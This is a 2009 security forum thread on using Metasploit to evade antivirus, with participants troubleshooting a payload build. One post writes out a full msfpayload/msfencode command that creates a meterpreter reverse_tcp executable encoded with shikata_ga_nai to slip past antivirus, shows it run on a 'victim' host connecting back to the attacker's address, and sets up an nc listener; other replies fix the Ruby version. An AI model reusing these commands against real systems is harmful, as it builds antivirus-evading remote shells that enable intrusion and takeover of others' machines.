Government Security
Network Security Resources

Jump to content

Photo

Bypassing Antivirus with Metasploit


  • Please log in to reply
12 replies to this topic

#1 webdevil

webdevil

    Retired GSO General

  • Sergeant Major
  • 1,195 posts

Posted 15 January 2009 - 06:05 PM

http://in.youtube.co...metasploit.html

Power of Metasploit!
:ph34r: :ph34r:

#2 packet

packet

    Specialist

  • Sergeant Major
  • 649 posts

Posted 20 January 2009 - 08:18 AM

That's a great demonstration. Good AV stops me about a third of the time when doing a Pentest so I'm always looking for good ways to get around it. Also when I am able to evade it I can show that one should not rely on AV alone and make a very good practical demonstration for defense in depth.

I've been pretty happy overall with the new 3.2 framework. Thanks for posting the video

--P>G>>
Abusus non tolit usum
The gopher is back!

#3 webdevil

webdevil

    Retired GSO General

  • Sergeant Major
  • 1,195 posts

Posted 20 January 2009 - 10:01 AM

Bypassing the AV's is I believe a new extension to exploitation, AV's are becoming smarter but not the smartest ;)
Moreover Metasploit is moving into alot of diversity, like DiderStevens building them a module for pdf exploits etc. :)

#4 berz3k

berz3k

    Private First Class

  • Members
  • 70 posts

Posted 21 January 2009 - 12:33 AM

Doesn't work!

$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=8080 R | ./msfencode -b '' -t exe -o meterpreter.exe
[-] Invalid format: exe

:-(

-berz3k.

#5 webdevil

webdevil

    Retired GSO General

  • Sergeant Major
  • 1,195 posts

Posted 21 January 2009 - 05:19 PM

I believe this is only supported with the latest version (or is it still not in the main trunk??)
Do an SVN update and check once more.

#6 berz3k

berz3k

    Private First Class

  • Members
  • 70 posts

Posted 22 January 2009 - 07:41 PM

Doesn't work! (Win32 Vista)

$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.20.40.32 LPORT=8080 R | ./msfencode -b '' -t exe -o meterpreter.exe
   
   ***********************************************************************
   ***																   *
   *** This version of the Ruby interpreter has significant problems, we *
   *** strongly recommend that you switch to version 1.8.6 until these   *
   *** issues have been corrected. Alternatively, you can download,	  *
   *** build, and install the latest Ruby snapshot from:				 *
   ***  - http://www.ruby-lang.org/									  *
   *** For more information, please see the following URL:			   *
   ***  - https://bugs.launchpad.net/bugs/282302						 *
   ***																   *
   ***********************************************************************
   
   [*] x86/shikata_ga_nai succeeded, final size 76
   
   intrusa@x ~/MSF/trunk
   $ chmod 777 meterpreter.exe

----------------------------------
Works fine over Unix port MACOX x86
----------------------------------


Creating the .exe file

sh-3.2# ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.20.40.32 LPORT=8080 R | ./msfencode -b '' -t exe -o meterpreter.exe
 [*] x86/shikata_ga_nai succeeded, final size 306

meterpreter.exe executed (Victim)
C:\>netstat -an
   
   Active Connections
   
	 Proto  Local Address		  Foreign Address		State
	 TCP	0.0.0.0:25			 0.0.0.0:0			  LISTENING
	 TCP	0.0.0.0:135			0.0.0.0:0			  LISTENING
	 TCP	0.0.0.0:445			0.0.0.0:0			  LISTENING
	 TCP	0.0.0.0:1025		   0.0.0.0:0			  LISTENING
	 TCP	0.0.0.0:1026		   0.0.0.0:0			  LISTENING
	 TCP	0.0.0.0:1027		   0.0.0.0:0			  LISTENING
	 TCP	0.0.0.0:1032		   0.0.0.0:0			  LISTENING
	 TCP	0.0.0.0:1040		   0.0.0.0:0			  LISTENING
	 TCP	0.0.0.0:1910		   0.0.0.0:0			  LISTENING
	 TCP	0.0.0.0:3372		   0.0.0.0:0			  LISTENING
	 TCP	0.0.0.0:4899		   0.0.0.0:0			  LISTENING
	 TCP	127.0.0.1:1903		 127.0.0.1:1902		 TIME_WAIT
	 TCP	172.18.0.27:139		0.0.0.0:0			  LISTENING
	 TCP	172.18.0.27:1910	   172.20.40.32:8080	  ESTABLISHED <----kool
	 UDP	0.0.0.0:135			*:*
	 UDP	0.0.0.0:401			*:*
	 UDP	0.0.0.0:402			*:*
	 UDP	0.0.0.0:445			*:*
	 UDP	0.0.0.0:1028		   *:*
	 UDP	0.0.0.0:1030		   *:*
	 UDP	0.0.0.0:3456		   *:*
	 UDP	172.18.0.27:137		*:*
	 UDP	172.18.0.27:138		*:*

Listen port (intruder)

C:\>nc -lp 8080
   
   c:\>	<---- Broken mmmm

Doesn't work! :-( does any1 know why?

-berz3k.

#7 DidierStevens

DidierStevens

    Specialist

  • Sergeant Major
  • 100 posts

Posted 23 January 2009 - 02:37 AM

Doesn't work! (Win32 Vista)

***********************************************************************
*** *
*** This version of the Ruby interpreter has significant problems, we *
*** strongly recommend that you switch to version 1.8.6 until these *
*** issues have been corrected. Alternatively, you can download, *
*** build, and install the latest Ruby snapshot from: *
*** - http://www.ruby-lang.org/ *
*** For more information, please see the following URL: *
*** - https://bugs.launchpad.net/bugs/282302 *
*** *
***********************************************************************


The explanation is right in the error message. msf needs Ruby 1.8.6. You probably downloaded the lastest Ruby Windows install from the Ruby site, which is 1.8.7. You need to remove this Ruby version and install 1.8.6.

#8 webdevil

webdevil

    Retired GSO General

  • Sergeant Major
  • 1,195 posts

Posted 23 January 2009 - 03:18 AM

@berz3k
I am not sure what you are trying?
you build the exe on the linux host with ip 172.20.40.32 and test on a vista host with ip 172.18.0.27. You build a reverse tcp connect shell and check for the reverse shell on the windows host??

@DidierStevens
If my memory serves me right, I have 1.8.6 and I still get the error. To confirm I will post my versions later on.

#9 DidierStevens

DidierStevens

    Specialist

  • Sergeant Major
  • 100 posts

Posted 23 January 2009 - 03:55 AM

@DidierStevens
If my memory serves me right, I have 1.8.6 and I still get the error. To confirm I will post my versions later on.


I used msf with Ruby 1.8.7 on a Windows XP box and didn't work, had to downgrade to 1.8.6. Was about a month ago.

#10 hamamo

hamamo

    Private

  • Members
  • 6 posts

Posted 24 January 2009 - 10:11 AM

this is a kind of how is getting smarter

#11 hamamo

hamamo

    Private

  • Members
  • 6 posts

Posted 24 January 2009 - 11:51 AM

by the way
nice VD and good job

#12 berz3k

berz3k

    Private First Class

  • Members
  • 70 posts

Posted 27 January 2009 - 11:40 AM

@DidierStevens

thanks for the info dude! , now i am changing the version ruby

@Webdevil

1)The meterpreter.exe builded over MACOSX/x86 (port) with reverse_tcp and 172.20.40.32 address and port 8080 works fine.

2) Then i was put the meterpreter.exe on the victim (172.18.0.27 win2k server) and i saw the connection TCP 8080 u can see the intruder address (172.20.40.32:8080), works fine using netstat.

BUT!!!

3) The intruder machine (172.20.40.32), I'm listening 8080 port nc -lp 8080 and the connection is broken :-(


-berz3k.

#13 zeknox

zeknox

    Private

  • Members
  • 1 posts

Posted 18 February 2012 - 11:29 AM

Bypassing AV with metasploit is a hot topic and there are a few different methods to attack this. I feel this article is one of the best methods for evading AV considering it gives the tester plenty of flexibility in obfuscating ASM instructions and allows for bypassing of Static Binary Analysis and Heuristic based AV engines.

http://www.pentestge...st-writing-asm/

Hope this helps!




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users